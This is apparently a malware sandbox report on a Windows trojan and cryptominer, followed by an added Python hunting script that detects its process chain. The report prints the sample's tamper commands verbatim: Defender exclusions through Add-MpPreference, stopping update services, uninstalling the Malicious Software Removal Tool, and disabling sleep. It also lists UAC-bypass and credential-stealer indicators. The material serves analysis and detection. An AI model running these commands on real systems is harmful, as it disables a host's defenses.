                        Source: C:\Windows\explorer.exe | Code function: 36_2_02AB02A0
                        Source: C:\Windows\explorer.exe | Code function: 36_2_02A06290
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F93C036_2_029F93C0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02ABB0E036_2_02ABB0E0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A881A036_2_02A881A0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02ABD6B836_2_02ABD6B8
                        Source: C:\Windows\explorer.exeCode function: 36_2_02ABA67436_2_02ABA674
                        Source: C:\Windows\explorer.exeCode function: 36_2_029FA7A036_2_029FA7A0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB148036_2_02AB1480
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A984C036_2_02A984C0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A7A41036_2_02A7A410
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A205A036_2_02A205A0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F55D036_2_029F55D0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A7651036_2_02A76510
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB1A9036_2_02AB1A90
                        Source: C:\Windows\explorer.exeCode function: 36_2_02ABAAF436_2_02ABAAF4
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A8282A36_2_02A8282A
                        Source: C:\Windows\explorer.exeCode function: 36_2_02ABB84C36_2_02ABB84C
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB090036_2_02AB0900
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB3EB036_2_02AB3EB0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A23EC036_2_02A23EC0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A7EEC036_2_02A7EEC0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A8FE7036_2_02A8FE70
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A81F8F36_2_02A81F8F
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB0FC036_2_02AB0FC0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029FAF0036_2_029FAF00
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A0DC5036_2_02A0DC50
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB4D9436_2_02AB4D94
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AAFDF036_2_02AAFDF0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB5DF036_2_02AB5DF0
                        Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\ggbfqxmgkimt.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                        Source: C:\Windows\explorer.exe Code function: String function: 013C3030 appears 48 times
                        Source: C:\Windows\explorer.exe Code function: String function: 013E3CE0 appears 137 times
                        Source: C:\Windows\explorer.exe Code function: String function: 00C08378 appears 48 times
                        Source: C:\Windows\explorer.exe Code function: String function: 027E3030 appears 48 times
                        Source: C:\Windows\explorer.exe Code function: String function: 02A23030 appears 48 times
                        Source: C:\Windows\explorer.exe Code function: String function: 027C5C20 appears 59 times
                        Source: C:\Windows\explorer.exe Code function: String function: 02A05C20 appears 59 times
                        Source: C:\Windows\explorer.exe Code function: String function: 013A5C20 appears 59 times
                        Source: C:\Windows\explorer.exe Code function: String function: 02803CE0 appears 137 times
                        Source: C:\Windows\explorer.exe Code function: String function: 02A43CE0 appears 137 times
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Code function: String function: 00007FF60AA91394 appears 32 times
                        Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: file.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 4.2.explorer.exe.be0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0.0.file.exe.7c0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0.2.file.exe.7c0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 36.2.explorer.exe.29f0000.0.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                        Source: 35.2.explorer.exe.27b0000.0.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                        Source: 33.2.explorer.exe.1390000.0.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                        Source: ggbfqxmgkimt.sys.8.dr Binary string: \Device\WinRing0_1_2_0
                        Source: classification engine Classification label: mal100.troj.spyw.expl.evad.mine.winEXE@53/12@2/3
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007DCA00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007D2AB0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoUninitialize
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1828:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3432:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1924:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\{C3397568-8840-4085-8F6E-BC07C085BB3B}
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1484:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\{EF67FEC6-3B78-4CEC-ADF5-E05B5411BD4E}
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3212:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6852:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\{650443EC-0EFE-4819-82E8-5F93F6D2E6A5}
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\{CCEFB138-B038-41E1-AC53-171A4E58AB6A}
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvqxcnws.ruv.ps1
                        Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\explorer.exe
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\explorer.exe
                        Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
                        Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
                        Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
                        Source: C:\Users\user\Desktop\file.exe Command line argument: %s\explorer.exe 0_2_007C1000
                        Source: C:\Users\user\Desktop\file.exe Command line argument: %s\svchost.exe 0_2_007C1000
                        Source: C:\Users\user\Desktop\file.exe Command line argument: %s\cmd.exe 0_2_007C1000
                        Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                        Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exe File read: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: explorer.exe, explorer.exe, 00000024.00000002.4590293308.0000000002AD8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: explorer.exe, explorer.exe, 00000024.00000002.4590293308.0000000002AD8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: explorer.exe, explorer.exe, 00000024.00000002.4590293308.0000000002AD8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: explorer.exe, 00000004.00000002.4654714736.0000000003790000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2441437406.0000000003318000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887254898.0000000001478000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000023.00000002.3723679443.0000000002898000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000024.00000002.4590293308.0000000002AD8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: explorer.exe, 00000021.00000003.2443399488.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2443202191.0000000001211000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2444879394.0000000001241000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2442913585.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2445134867.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2442800365.0000000001201000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3590120838.0000000000E91000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3547811402.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3555528319.0000000002927000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3511812127.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3511903196.0000000002927000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
                        Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                        Source: C:\Windows\explorer.exe Process created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                        Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\explorer.exe explorer.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
Source: C:\Windows\explorer.exe | Process created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
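The process-creation chain above is a compact defense-evasion and persistence playbook: Defender exclusions added through Add-MpPreference (first for two specific binaries and all of C:\ProgramData, then for the whole user profile and ProgramData plus every .exe), sc stop of the Windows Update, update medic, BITS and Delivery Optimization services, wusa removing KB890830 (the Malicious Software Removal Tool package), powercfg zeroing the standby and hibernate timeouts so the miner is never interrupted, and explorer.exe being launched by a binary under C:\ProgramData before it in turn spawns the dropped executable. The Python below is an added example written for this page, not Joe Sandbox's code and not anything from the sample; it encodes those observations as hunting rules and runs them over (parent image, child command line) pairs constructed from the lines above. The rule names, the set of parents allowed to start explorer.exe and the "broad exclusion" heuristic are assumptions of the example, not facts from the report.

```python
"""Hunting rules for the process-creation chain in this report (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Windows Update, BITS and Delivery Optimization services the sample stops (names from the report).
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
# Assumption: the only parents that start explorer.exe in a normal interactive session.
EXPLORER_PARENTS = {"explorer.exe", "userinit.exe", "winlogon.exe"}

# Constructed from the "Process created" lines above: (parent image, child command line).
SAMPLE_EVENTS = [
    (r"C:\Users\user\Desktop\file.exe",
     r"cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'"),
    (r"C:\Users\user\Desktop\file.exe", r'"C:\Windows\explorer.exe"'),
    (r"C:\Windows\explorer.exe", r'"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""'),
    (r"C:\Windows\explorer.exe", r"C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}"),
    (r"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe",
     r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"),
    (r"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe", r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    (r"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe", r"C:\Windows\system32\sc.exe stop UsoSvc"),
    (r"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe", r"C:\Windows\system32\sc.exe stop WaaSMedicSvc"),
    (r"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe", r"C:\Windows\system32\sc.exe stop wuauserv"),
    (r"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe", r"C:\Windows\system32\sc.exe stop bits"),
    (r"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe", r"C:\Windows\system32\sc.exe stop dosvc"),
    (r"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe", r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"),
    (r"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe", r"C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0"),
    (r"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe", r"explorer.exe"),
    (r"C:\Windows\System32\sc.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),  # benign noise
]


@dataclass(frozen=True)
class Alert:
    rule: str
    parent: str
    cmdline: str


def image_name(path: str) -> str:
    """Last path component, lower-cased: 'C:\\Windows\\explorer.exe' -> 'explorer.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(parent: str, cmdline: str) -> list:
    """Return the names of every rule this (parent, command line) event matches."""
    cl = cmdline.lower()
    hits = []
    # Defender tampering: any exclusion is notable; whole-tree or all-.exe exclusions are worse.
    if "add-mppreference" in cl and ("-exclusionpath" in cl or "-exclusionextension" in cl):
        hits.append("defender_exclusion_added")
        if "-exclusionextension" in cl or "programdata" in cl or "userprofile" in cl:
            hits.append("defender_exclusion_broad")
    # sc stop of the update / BITS / Delivery Optimization services.
    m = re.search(r"\bsc(?:\.exe)?\s+stop\s+(\S+)", cl)
    if m and m.group(1) in UPDATE_SERVICES:
        hits.append("update_service_stopped")
    # KB890830 is the Malicious Software Removal Tool package.
    if re.search(r"\bwusa(?:\.exe)?\b.*?/uninstall\b.*?/kb:890830\b", cl):
        hits.append("msrt_uninstalled")
    # powercfg /x -<standby|hibernate>-timeout-<ac|dc> 0 keeps the host awake for mining.
    if re.search(r"\bpowercfg(?:\.exe)?\s+/x\s+-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b", cl):
        hits.append("sleep_disabled")
    # explorer.exe started by anything other than the session's shell processes.
    tokens = cl.split()
    first = tokens[0].strip('"') if tokens else ""
    if image_name(first) == "explorer.exe" and image_name(parent) not in EXPLORER_PARENTS:
        hits.append("explorer_spawned_by_unusual_parent")
    return hits


def triage(events) -> list:
    """Run every rule over (parent, cmdline) pairs; alerts come back in event order."""
    return [Alert(rule, parent, cmdline) for parent, cmdline in events for rule in evaluate(parent, cmdline)]


def summarize(alerts) -> dict:
    """Distinct rules per parent image; the process tripping several is the chain to pull."""
    per_parent = {}
    for a in alerts:
        per_parent.setdefault(image_name(a.parent), set()).add(a.rule)
    return per_parent


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for a in found:
        print(f"{a.rule:36s} {image_name(a.parent):24s} {a.cmdline[:70]}")
    for parent, rules in summarize(found).items():
        print(f"{parent}: {len(rules)} distinct rules")
```

Run against the constructed events, the conhost and the explorer-to-explorer CLSID launches produce nothing, while WindosCPUsystem.exe trips all six rules and file.exe trips three; that clustering of unrelated tamper actions under one parent is what separates the sample from an administrator running any single one of these commands. The explorer rule also fires on file.exe launching explorer.exe, which is exactly the host-process staging the "Injects code into the Windows Explorer" signature describes.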
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dbgcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
